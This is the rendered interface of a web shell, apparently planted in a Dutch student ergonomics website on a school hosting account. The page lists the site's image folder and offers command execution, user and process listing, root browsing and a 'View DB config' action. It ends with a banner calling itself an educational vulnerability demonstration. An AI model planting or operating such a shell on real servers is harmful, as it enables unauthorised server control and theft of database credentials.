🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/584752.klas4s23.mid-ica.nl/public_html/l3-pro-3-ergowijzer-spa-rood/images

📁 ..
📄 61ed8250bf025158e74b7ba5deccbb0b.jpg [view]
📄 IMG_0243.PNG [view]
📄 RSI-pijn.jpg [view]
📄 RSI.png [view]
📄 Screenshot-2023-10-19-at-9.03.05-PM.png [view]
📄 Shooting-PlayStation.gif [view]
📄 Shooting-PlayStation.mp4 [view]
📄 beeldschermwerk.jpg [view]
📄 beeldschermwerk.png [view]
📄 bewegen.png [view]
📄 bewegingsdriehoek.png [view]
📄 bg-egro2.png [view]
📄 bg-ergo.png [view]
📄 bowtie-4.png [view]
📄 ef28ba12-c8ed-46d4-838b-a4c95ef5b469-profile_image-300x300.png [view]
📄 ergonomie.png [view]
📄 gezondegewoontes.png [view]
📄 logo.png [view]
📄 zithouding.png [view]

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!